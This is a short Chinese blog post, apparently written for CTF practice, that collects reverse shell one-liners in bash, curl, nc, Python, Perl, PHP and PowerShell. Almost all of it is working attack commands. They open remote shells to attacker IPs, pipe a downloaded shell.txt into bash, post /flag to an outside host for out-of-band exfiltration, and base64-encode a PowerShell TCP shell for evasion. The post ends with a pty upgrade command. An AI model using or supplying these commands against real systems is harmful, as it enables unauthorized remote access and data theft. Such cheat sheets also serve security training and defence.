反弹shell

收集一点可能用上的反弹shell命令

bash

bash -i >& /dev/tcp/ip/port 0>&1

curl

bash -i >& /dev/tcp/192.168.20.151/7777 0>&1
curl http://174.1.73.154/shell.txt|bash

PS:OOB的时候可以

curl 174.2.171.201:6666 -d @/flag

@表示文件

nc

nc -e /bin/sh ip port

python

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

perl

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"ip:port");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"174.0.224.117:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

php

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

PowerShell

[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('$c=New-Object Net.Sockets.TCPClient("174.1.52.162",6666);$s=$c.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$s.Read($bytes, 0, $bytes.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sb=(iex $d 2>&1 | Out-String );$sb2=$sb+''PS ''+(pwd).Path+''> '';$sb=([Text.Encoding]::Default).GetBytes($sb2);$s.Write($sb,0,$sb.Length);$s.Flush()};$c.Close()'))

powershell -nop -enc {reverse shell command}

获取更好用的shell

Upgrading Simple Shells to Fully Interactive TTYs

pty

python -c 'import pty; pty.spawn("/bin/bash")'

参考

各种环境下反弹shell的方法
Reverse Shell Cheat Sheet

posted @ 2020-03-02 20:53  MustaphaMond  阅读(886)  评论(0编辑  收藏  举报